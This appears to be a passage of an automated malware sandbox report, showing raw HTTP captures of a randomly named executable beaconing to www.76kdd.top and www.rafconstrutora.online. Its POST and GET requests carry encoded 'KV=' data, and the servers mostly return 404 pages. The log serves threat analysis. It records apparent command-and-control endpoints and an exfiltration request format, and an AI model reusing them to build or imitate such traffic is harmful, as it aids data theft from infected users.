                                                                                                                        Data Ascii: KV=nBU8DXPIY2xzZWYNYBWfPgNy5OsE4Bbsnz2WGewsPjk/6fgKvZ9C0VVDLYSi6eSumni9MMX9TV22gcJYmiRSxb6j+JiYjs7u5C8r4TjM+YZJmsn8mNSTl6cfPS+Jo5zb/OJ+l3qOwhUy9HuaxcdXD9H2Mso2nCrxZMc61/zpVSYZVXKeIxnvkKaY6wXUIzWT4Ly6bmZvfsylDI2pynZ/OMvEVdB6jTHUINEB9Yg14bcfZlRJr+XhtKmoqBEhOkfOmmFEwd+ZOonM9pojHbWAJExpVxeqQbQOZKPg6XOapOoxug0slPzthrS3YNwLCqlsog7lU7IpCbVwSv0TB0WSAFuHjDrbjk5bSJyZGK/P5wfBIwDcCWal9FAqut7vRCn0qwNw8ERx8VoJRIpu7R0k7Yw6JNlmx4eW9if0jYRzbqA/71q9arADF5v9T/8SeSPeikBxBbMrgdf3h5BNigXbIB4QZMsqQFQonf5mQiYEg21t8b90laCFUHGhLtkBQHvCPEx1HG/14Vlu6Kksxk75nOgkQi48SeWyFC9iv5fCjU+AIpTQVkIbdMwaF6EToyuWba4KORsu3cifJNnvDRGhG8VZnoMw2mQKwDdiXXODdEpLBPSb0Dq37XK0YdM/Fza5uAxiFOFGU63svULn0yi77WOZTBXrch47/pPKu0WtsUbdJlhVzfPyDcKM9j4ODk7zPbi8QKmAb4knH6spwCZu4pS1AX6EifJhgR+wiZzloTR5WEraLnUNCMK0hA3AFW5ymU021lihcDzhFemWtH8yCeKTc+gkwk81nKtZCBFPbBKFDyzL5g0JNhcewUdRR8bSYcBiG4NQLdNPRi1pTTJAa9pJhzP0RPzPzcmuDatPWWc2hEVxfYvP7eyqLKwlFISjBdXve3XQDyEMKOlIW8CvDMr3kn97Dg13hibtXuFFVciykU/iTI1iwPnS+eq3L+feXELLWiadHVgN94NaQtq/OFhLEqM3jA4hUV5aoP4WajRFdJb5u [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:56:51.363568068 CET312INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Wed, 20 Nov 2024 15:56:51 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 148
                                                                                                                        Connection: close
                                                                                                                        ETag: "66e02f2c-94"
                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        40192.168.2.115001638.47.232.194803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:52.546979904 CET501OUTGET /idu4/?KV=qD8cAnDgckBLYUQoRh7zBwgp4vAR8SH4vArrPOMmIDAln/sBv7g5z1sASbSU3sLbiWKHdb75VGXih9cbyGRF9rbA94O5jPyz1SB60B/cp/B1u7O6lua4pvo=&Wno=a0qDq HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.76kdd.top
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:56:54.132671118 CET312INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Wed, 20 Nov 2024 15:56:53 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 148
                                                                                                                        Connection: close
                                                                                                                        ETag: "66e02f2c-94"
                                                                                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        41192.168.2.1150017172.67.159.24803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:59.760895967 CET801OUTPOST /04wl/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.rafconstrutora.online
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.rafconstrutora.online
                                                                                                                        Referer: http://www.rafconstrutora.online/04wl/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 34 32 74 32 61 6e 63 71 64 4e 54 32 75 4a 31 51 49 70 50 4e 32 37 62 65 73 42 33 68 43 45 50 6d 48 77 4d 30 4b 4b 6d 61 70 6e 38 57 45 6a 46 73 6f 63 35 39 4a 78 33 43 4c 46 54 2f 36 6c 56 59 4a 44 45 43 78 67 79 72 31 36 51 52 66 57 72 54 6d 4e 31 4f 33 39 6d 4e 59 55 48 4b 49 4e 62 77 46 74 6e 4f 5a 33 63 74 38 46 68 39 59 6d 33 74 44 39 59 53 78 74 58 2b 36 72 2b 5a 30 46 45 7a 4b 54 4f 41 39 65 4b 4f 50 51 64 34 59 50 4b 54 5a 6e 35 55 55 48 65 79 77 52 56 56 77 46 6a 77 57 65 34 70 51 4c 64 77 63 54 41 62 74 2f 48 75 61 69 35 70 62 4f 5a 5a 45 69 30 58 6f 6d 39 4f 78 77 3d 3d
                                                                                                                        Data Ascii: KV=42t2ancqdNT2uJ1QIpPN27besB3hCEPmHwM0KKmapn8WEjFsoc59Jx3CLFT/6lVYJDECxgyr16QRfWrTmN1O39mNYUHKINbwFtnOZ3ct8Fh9Ym3tD9YSxtX+6r+Z0FEzKTOA9eKOPQd4YPKTZn5UUHeywRVVwFjwWe4pQLdwcTAbt/Huai5pbOZZEi0Xom9Oxw==
                                                                                                                        Nov 20, 2024 16:57:00.972490072 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Date: Wed, 20 Nov 2024 15:57:00 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1hmMZPL6xLS5oDdggY7njLBY0BAIVODzUXWNdDYJIEpO77%2F4%2BwyVE1hH2LldhpWknhvZ1n%2BrieMqALARzA89irO0EGwh2UdPLbOhpXeb9vXudOBjH%2FGCjAPLNEyMWRhKPdwCTPvpgUBhUOD"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e59a21f8cfb1899-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1509&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=801&delivery_rate=0&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 33 34 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                                                                        Data Ascii: 34bnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-F.
                                                                                                                        Nov 20, 2024 16:57:00.972517014 CET467INData Raw: 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec 9d aa 47 95 b1 23 cd 2c f6 ed f2 77 25 72 81 e8 ff 13 b1 26 eb
                                                                                                                        Data Ascii: Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =tddX;


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        42192.168.2.1150018172.67.159.24803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:57:02.428574085 CET821OUTPOST /04wl/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.rafconstrutora.online
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.rafconstrutora.online
                                                                                                                        Referer: http://www.rafconstrutora.online/04wl/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 34 32 74 32 61 6e 63 71 64 4e 54 32 38 35 6c 51 46 75 7a 4e 77 62 62 5a 79 52 33 68 4d 6b 50 71 48 77 51 30 4b 50 47 4b 70 55 49 57 45 42 64 73 70 5a 56 39 4f 78 33 43 53 31 54 36 31 46 56 44 4a 44 4a 31 78 6c 53 72 31 36 30 52 66 58 62 54 6d 2b 74 4e 31 74 6d 50 52 30 48 4d 47 74 62 77 46 74 6e 4f 5a 33 59 4c 38 46 35 39 59 56 76 74 44 66 67 4e 75 64 58 39 71 37 2b 5a 77 46 45 33 4b 54 4f 69 39 66 6d 30 50 57 5a 34 59 4b 4f 54 41 57 35 4c 4f 58 65 77 2f 78 55 31 37 31 6d 66 5a 74 39 31 58 4e 42 37 66 41 55 6d 73 35 4b 30 4b 42 77 2b 59 64 52 62 51 45 56 6e 68 58 59 48 71 34 69 4e 53 75 55 77 6d 38 7a 79 63 59 71 4a 2f 4a 63 7a 70 51 30 3d
                                                                                                                        Data Ascii: KV=42t2ancqdNT285lQFuzNwbbZyR3hMkPqHwQ0KPGKpUIWEBdspZV9Ox3CS1T61FVDJDJ1xlSr160RfXbTm+tN1tmPR0HMGtbwFtnOZ3YL8F59YVvtDfgNudX9q7+ZwFE3KTOi9fm0PWZ4YKOTAW5LOXew/xU171mfZt91XNB7fAUms5K0KBw+YdRbQEVnhXYHq4iNSuUwm8zycYqJ/JczpQ0=
                                                                                                                        Nov 20, 2024 16:57:03.655211926 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Date: Wed, 20 Nov 2024 15:57:03 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5zYhwiW8ceVbqpvMBL%2FNFJqDTrl%2BaA6VitUQfnH0hwRpje6H8n3B0%2FyDdlhZOju9CrqLmQlTeCjewb4ai89XgHLftpO%2FL5z8Z%2Fneh3qKjjljv5PfUfwTD4%2BkGzIO9lj%2Fbslbf3gbXtnplsdI"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e59a2302c080f7f-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1500&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=821&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                                                                        Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-
                                                                                                                        Nov 20, 2024 16:57:03.655276060 CET478INData Raw: 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec 9d aa 47 95 b1 23 cd 2c f6 ed f2 77 25 72 81
                                                                                                                        Data Ascii: F.Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =tdd


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        43192.168.2.1150019172.67.159.24803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:57:05.099891901 CET1834OUTPOST /04wl/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.rafconstrutora.online
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1231
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.rafconstrutora.online
                                                                                                                        Referer: http://www.rafconstrutora.online/04wl/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 34 32 74 32 61 6e 63 71 64 4e 54 32 38 35 6c 51 46 75 7a 4e 77 62 62 5a 79 52 33 68 4d 6b 50 71 48 77 51 30 4b 50 47 4b 70 55 51 57 45 55 42 73 6f 36 74 39 50 78 33 43 61 56 54 37 31 46 55 42 4a 44 68 35 78 6c 57 37 31 38 77 52 65 77 7a 54 76 76 74 4e 38 74 6d 50 54 30 48 4a 49 4e 62 6c 46 74 32 48 5a 33 6f 4c 38 46 35 39 59 55 66 74 54 64 59 4e 31 64 58 2b 36 72 2b 76 30 46 45 50 4b 56 6e 66 39 66 53 65 50 6d 35 34 59 71 65 54 43 45 52 4c 46 58 65 2b 34 78 55 58 37 30 61 41 5a 73 52 35 58 4e 64 42 66 47 6b 6d 73 38 54 59 61 79 34 71 4f 76 51 72 45 31 56 72 68 69 6b 31 73 4a 4b 32 52 73 55 6c 77 62 48 50 5a 39 4b 47 74 62 41 35 33 30 44 64 30 5a 75 66 2f 6b 4c 46 43 58 61 32 66 34 50 6b 54 55 6a 68 34 34 49 6d 48 52 6a 66 63 57 49 76 42 67 56 33 52 72 54 44 52 49 7a 67 63 34 41 6d 36 52 30 6c 43 74 67 49 59 79 72 72 48 32 75 64 57 69 6f 41 31 64 72 2b 36 4a 54 72 68 76 4b 55 4a 41 45 31 39 46 36 6b 31 44 6f 35 57 78 2b 6e 55 6c 70 54 73 65 78 57 33 51 54 35 44 74 55 63 54 75 72 50 78 54 50 [TRUNCATED]
                                                                                                                        Data Ascii: KV=42t2ancqdNT285lQFuzNwbbZyR3hMkPqHwQ0KPGKpUQWEUBso6t9Px3CaVT71FUBJDh5xlW718wRewzTvvtN8tmPT0HJINblFt2HZ3oL8F59YUftTdYN1dX+6r+v0FEPKVnf9fSePm54YqeTCERLFXe+4xUX70aAZsR5XNdBfGkms8TYay4qOvQrE1Vrhik1sJK2RsUlwbHPZ9KGtbA530Dd0Zuf/kLFCXa2f4PkTUjh44ImHRjfcWIvBgV3RrTDRIzgc4Am6R0lCtgIYyrrH2udWioA1dr+6JTrhvKUJAE19F6k1Do5Wx+nUlpTsexW3QT5DtUcTurPxTPuQwhknb6xGyyEdsWrtxWc/4gEYPxORMsyJil1+8SQPGpNFBBHaGKLFbEEMiBoAAqSeVAFcbLhOK6KAMGjYa6HiRlOo4WiuLGXXvWZRDbRaM26OYe2BVSVZxoiBPjSPjR1kMG9klk2r7r0W5jbs6sozR1Xau2AzXrH3sw0GPcGaKAdwRSFpV+mFgA9GgseYiMsDhsW8PNOpEHwXLdX+uau+OiumxDIOe5DrctAI+yUr9//D+omvTwK4zw/l9augUcWg+KBoCVF8hEv8+k5+nRSnuKepuieROHMgQdgJBojorDuCY2VgZupePo9XpO/fYjFKcWG1hsEFiJJ+C1D3C0nHde0b0zbgee/63/Di1LEYZso33oltsrNGvu9YOhZFzsVgMndPgdIXW03in7W4dMMVQmgmMdw7Q1WDdeMlOzFf/K+LlcLDZOM3HkcahltswshXJCBJ5LPsTrJClMPbU7s9gakYYvySMwm75qZDy96quGUm/sRBMSHF91dc0UwgFQIPhXP5yzCsGJ8qT3YnRUKpew95b6bHmnbFPhgllOKEOhugBhXT0Jpyi78CHXxgQ0bTXdUvih8Kpx+tQ+KFudlc9+AVswXvCpxroZsJwvh3eWe2c6kQOsTZ64eisFFqyvTr5kNB4zaCP1/3fXZcmMVcPSYKzdg6iBww [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:57:06.447819948 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Date: Wed, 20 Nov 2024 15:57:06 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqBMkhpOE6J0R9SvIvc31Nx8n%2FJccHoLeQFmUKhm%2FcSTb1OiLtWz27LYqC4GURJAZy%2BmIw3BEhniG8FT%2B6AP8eOlAPlyLTkmCAoWNooDk9R0TrY5LDv56XOo5%2Fi9ppAZyRSXSSksQB8GyFQm"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e59a2411ea043d0-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1627&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1834&delivery_rate=0&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                                                                        Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-F.
                                                                                                                        Nov 20, 2024 16:57:06.447949886 CET475INData Raw: 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec 9d aa 47 95 b1 23 cd 2c f6 ed f2 77 25 72 81 e8 ff 13
                                                                                                                        Data Ascii: Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =tddX


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        44192.168.2.1150020172.67.159.24803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:57:07.774820089 CET513OUTGET /04wl/?KV=10FWZSQ9WPLVyv9qBMSr5p2LrQDaGm/mNCwAUqa3tlQsFj4tjY5WEjDNTnPsz2N9DzYKtSqEkqZ6JmaP68J/ydW7QnrBD/a7HdnFb2gh9G13RXTqS9Au/Yk=&Wno=a0qDq HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.rafconstrutora.online
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:57:09.031634092 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Date: Wed, 20 Nov 2024 15:57:08 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8YEKMAkxfBN2CzwjbWQrDYELRAv2oiMG%2Flid7Vb%2B6PD4656EVnwDNvMVUAQge5iyG5UkrAHQfRuCFORhJN5TQcKDYBTIRYD3ubY8rhyrEnBlvXReEciF9ng9FH9Xzen2G%2BPL%2Bqdj3U6aS68Q"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e59a25198e418bc-EWR
